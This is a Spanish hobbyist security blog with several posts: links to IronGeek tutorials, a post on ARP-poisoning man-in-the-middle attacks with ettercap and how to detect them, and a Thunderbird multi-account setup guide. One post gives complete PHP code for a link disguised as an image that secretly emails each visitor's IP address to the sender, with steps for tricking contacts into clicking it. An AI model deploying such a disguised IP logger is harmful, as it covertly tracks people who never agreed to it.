La semana pasada volví al colegio mayor y como os podréis imaginar no tengo mucho tiempo para la web. Esto es una locura!. Sin embargo no os penséis que me he olvidado de vosotros. Hoy os voy a pedir que os deis un paseo por IronGeek.com.

IronGeek es una de las mejores paginas de iniciación en temas de seguridad. La sección de vídeo tutoriales y algunos de los artículos de seguridad son geniales!

Hechadle un ojo a estos vídeo tutoriales, merecen la pena!:

• Introducción a nmap 1/2
• Introducción a nmap 2/2
• Romper cadenas md5
• Introduccion a metasploit

Un saludo.

Seguramente alguna vez se has necesitado/querido tener acceso a las ip de algunos de tus contactos de Messenger. Hasta ahora, la única manera que, por lo menos yo, conocia para obtenerla era mandándoles un archivo y capturar la ip durante la transmisión. Aunque dicho método funciona, no es demasiado práctico.

Hoy navegando por Internet me he cruzado con Profit42.com. Profit42.com es una especie de blog/comunidad donde entre otros temas hablan de cosas de seguridad y tienen colgados unos cuantos tutoriales. Uno de ellos es sobre el que voy a hablar ahora (Fuente original).

El objetivo consiste en que la victima pulse sobre un link, aparentemente inofensivo, que automáticamente nos mandara un email su ip. Realmente, dicho link no es mas que una pequeña pagina en php, que automáticamente envía un mail con la ip de todo aquel que acceda a el. El unico requesito es tener acceso a un dominio con soporte para php.

Ejemplo:

Creemos una carpeta llamada foto.jpg
En dicha carpeta guardaremos una imagen (http://LoQueSea.com/foto.jpg/foto.jpg) y crearemos un documento “index.php” (http://LoQueSea.com/foto.jpg/index.php) con el siguiente codigo:

<?PHP
$remote_addr = getenv(‘REMOTE_ADDR’);
$toaddress = “tuMail@mail.com”; // tu email!
$subject = “Asunto”; // asunto del email
$message = ” IP: $remote_addr”; // Cuerpo del mail
$fromname = “CapturaIp”; // Quien lo envía
$fromaddress = “loQueTeDeLaGana@LoQueSea.com”; // Email de quien lo envía
$headers = “MIME-Version: 1.0\n”;
$headers .= “Content-type: text/plain; charset=iso-8859-1\n”;
$headers .= “X-Priority: 3\n”;
$headers .= “X-MSMail-Priority: Normal\n”;
$headers .= “X-Mailer: php\n”;
$headers .= “From: \”".$fromname.”\” <”.$fromaddress.”>\n”;
mail($toaddress, $subject, $message, $headers);
?>
<img xsrc=”foto.jpg”>

Cuando alguien acceda a Index.php:

1. Mandara la ip a tuMail@mail.com
2. Mostrara foto.jpg

Aqui un ejemplo del resultado: http://icaix.com/gracioso.jpg
Descargatelo desde Aqui

Como ejecutar el ataque?

Simplemente mándales a tus amigos un link a http://dominoConSoportePhp.com/foto.jpg y listo, recibirás un mail segundos mas tarde con su ip.

Si ya de por si detectar ARP Poisoning es complicado. Detener uno de estos ataques es más que difícil. Sin duda, una de las pocas, por no decir la única “solución” es configurar las tablas de ARP manualmente, ya sea bien introduciendo la relación entre las direcciones IP y MAC de todos los equipos, o simplemente (algo mas flexible) la del router o gateway. Como os podréis imaginar, dicho método puede ser una pesadilla en redes con varios cientos de equipos, y por lo general no se usa.

Otro pregunta que surge es “que hacer” en caso de detectar un posible ataque. No podemos bloquear dichos equipos ya que entonces aumentamos el riesgo de ataques de DoS (Denial of Service), haciendo del remedio peor que la enfermedad. Por lo general, lo que se suele hacer es monitorizar dichos ataques intentando localizar a los intrusos a posteriori.

Ya que siempre existe el riesgo de que alguien este a la escucha, la única manera de asegurarnos que la información permanece secreta es encriptandola (VPN, SSL, SSH, etc.). Si el alguien tiene acceso a ella, que por lo menos no la entienda no? Es por eso que la transmisión en “Plain Text” es extremadamente insegura y protocolos como Telnet o Ftp deberían dejar de usarse.

Aqui un links a los videos:

Video Tutorial 1: ARP poisoning – Main in the middle attack – (1/3)
Video Tutorial 2: ARP poisoning – ettercap – (2/3)
Video Tutorial 3: ARP poisoning – Detección – (3/3)

Aquí os dejo el segundo capitulo de la trilogía de ARP Poisoning. Espero que os guste. En este tutorial os enseño como de forma muy básica y simple conseguir lo explicado en el episodio anterior.

Con ettercap se puede hacer prácticamente de todo. Una vez establecido el ataque y ya una vez con acceso al trafico ettercap te permite el uso de plugins con los que hacer cosas muy chulas; dns spoofing, falsificado de certificados ssl, sniffado de passwords, etc.

Otro de los grandes potenciales de ettercap es que te permite crearte tus propios plugins!, solo necesitas algunos conocimientos básicos de redes, algo de imaginación y ganas de hacer algo chulo y ettercap te ayudara a hacer el resto.

Espero que este video os cree cierta curiosidad en el tema y de a partir de ahora seáis vosotros los que os pongáis manos a la obra!
El próximo capitulo mostrare como detectar este tipo de ataques!

Video Tutorial 1: ARP poisoning – Main in the middle attack – (1/3)
Video Tutorial 2: ARP poisoning – ettercap – (2/3)

Un saludo. Miggs

Alguna vez te has preguntado que es eso de un “mitm” (man in the middle attack)? Icaix.com en su nueva serie de vídeo tutoriales de seguridad no solo te explicara que son y como funcionan, sino además, como ejecutarlos y por supuesto como detectarlos tu mismo.

Por ahora, en este primer tutorial explicamos como funcionan.

Esperamos que os gusten!.

Video Tutorial 1: ARP poisoning – Main in the middle attack – (1/3)

Un saludo. Miggs

Bueno, es hora de empezar a hablar de temas de seguridad, ya que la verdad, hasta ahora he hablado poco.

Tengo que aclarar que no soy ningún guro de la seguridad ni mucho menos. Soy un novato intentando aprender. La única diferencia entre mi y muchos otros es que iré comentando aquello que vaya aprendiendo. Por favor, aquellos que SI que sepáis y os sentáis ofendidos por mis errores por favor decídmelo!, no me jodáis el servidor!!!

Los vídeos (o presentaciones flash) los estoy haciendo con “wink” bajo Debian Linux. Todos aquellos tutoriales creados por icaix estarán bajo licencia GPL, Así que siente te libre de utilizar modificar y distribuirlos bajo dichos términos (Leerme). Si que me gustaría que si los usáis, me mandaseis un mail, Así sabré que por lo menos le han sido de utilidad a alguien!

Dicho esto, solo una cosa mas… divertiros!

Un saludo. Miggs

Te has parado a pensar alguna vez cuanto tiempo pierdes a diario accediendo a tus cuentas de email? Gracias a mozilla ThunderBird (o Icedove en Debian) podremos gestionar de una manera fácil, rapida y sencilla múltiples cuentas desde nuestro escritorio (aprox 2 min por cuenta).

Antes de mostraros como hacerlo, seria interesante que conocierais un poco los diferentes parámetros que nos iremos encontrando. Brevemente, voy a introduciros a aquellos conceptos basicos y necesarios con los que podréis configurar cualquier gestor de correo, no solo en Thunderbird, si no en cualquier otro.

Bien, lo primero que debemos entender es que solo hay dos cosas que podemos hacer con un email; Recibir y Enviar. Tiene sentido no? Ambos procesos son completamente independientes y por tanto habrá que configurarlos por separado.

Recepción emails

Cuando recibimos un email, normalmente hay un servidor de correo en alguna parte escuchando las 24 horas del día. Cuando recibe un mail, este es guardado hasta que usuario lo lee y decide cuando es el momento de eliminarlo.A día de hoy, la gestión del correo entrante se realiza normalmente con uno de los siguientes protocolos.

POP (Post Office Protocol), En este caso el servidor de correo es una zona de almacenamiento temporal para los emails entrantes. Una vez el usuario accede a su mail, este es transferido a su equipo, liberando el espacio ocupado en el servidor (su funcionamiento es similar al del buzón de correo en el sistema de correo tradicional).

Ventajas:

Minimo tiempo de conexión. Optimo para conexiones en las que se tarifa por minuto.
Mínimo uso de recursos de almacenamiento en el servidor (ya que una vez transferido se elimina)
Al estar el mail almacenado en tu equipo y podrás acceder a el sin necesidad de conectarte
Más extendido, y por tanto más software a su disposición.

Desventajas:

Solo se puede acceder al mail desde que el equipo desde el que te lo has descargado (malo si trabajas en varios equipos).
La mayoría de los servidores de correo que usan POP te permiten la opción de almacenar el mail en sus servidores, con el fin de evitar dicho problema. Ahora…, hay que tener cuidado a la hora de configurarlo si no quieres llevarte sorpresas.

IMAP (Internet Message Access Protocol), en vez de descargar los emails en el equipo del usuario, estos son guardados en el servidor, permitiendo al usuario acceder a el desde cualquier lugar de la red.

Ventajas:

Acceso desde múltiples equipo.
Descarga los emails solo cuando el usuario quiere leerlos (menor transferencia de datos)
Permite acceso “online”, “offline” o “disconnected”.

Si os dan la opción os recomiendo IMAP ya que los efectos de confundirse son menores.

Envió de mail

SMTP (Simple Mail Transfer Protocol). Solo tenemos una opción. Simplemente insertas el servidor de SMTP y listo. Por lo general con configurar un servidor de SMTP vale, sin embargo podremos configurar varios para posteriormente tener la opción de enviar mails desde diferentes “origenes”. Es servidor de SMTP se selecciona desde la pestaña “From” en la ventana de creación del mail.Dicho esto aquí os dejo los parametros de algunos de los servidores que os pueden interesar. Los que tengáis varias cuentas dentro de un mismo proveedor (véase gmail), no os preocupéis ya que podréis crear múltiples cuentas en paralelo.

Google Gmail

Tu Nombre: NombreQueQuierasQueSalgaEnElCampoFrom
Email Address: tuEmail@gmail.com
Tipo de Servidor de entrada: POP
Incoming Server: pop.gmail.com (SSL, puerto 995)
Outgoing Server: smtp.gmail.com (TLS, puerto 587)
Incoming User Name: tuEmail@gmail.com
Outgoing User Name: tuEmail@gmail.com

Guia oficial gmail. Aqui
Ver video tutorial icaix! Aqui

Upcomillas mail

Tu Nombre: NombreQueQuierasQueSalgaEnElCampoFrom
Email Address: tuEmail@alumnos.upcomillas.es
Tipo de Servidor de entrada: POP/IMAP
Incoming Server: alumnos.upcomillas.es (SSL, puerto 995, opcional)
Outgoing Server: alumnos.upcomillas.es
Incoming User Name: 200-XXX-XXX (numero de alumno)
Outgoing User Name: 200-XXX-XXX (numero de alumno)

Pagina de ayuda STIC Aquí.
Ver video tutorial icaix! Aqui

Microsoft Hotmail y Yahoo mail.

Este servicio, en principio, solo lo ofrecen a usuarios “Premium” y por tanto no esta disponible al público en general. Si que es cierto que hay plugins que permiten la descarga vía http.
Si hay interés, seguramente escriba una expansión de este “mini tutorial” mostrándoos como hacerlo.
Para los impacientes, Aquí os dejo un link a uno de esos plugins

Bueno, pues eso es todo. Realmente es mas sencillo de configurar de lo que parece. Yo ahora después de 6 meses usándolo me pregunto el porque no lo había probado antes. La verdad es ahorra mucho tiempo, te permite el control de varias cuentas simultáneamente, y lo mejor es que te avisa cuando recibes un nuevos emails. Os recomiendo que lo probéis ya que seguramente cambiara vuestros hábitos del uso del email.

Un saludo.Miggs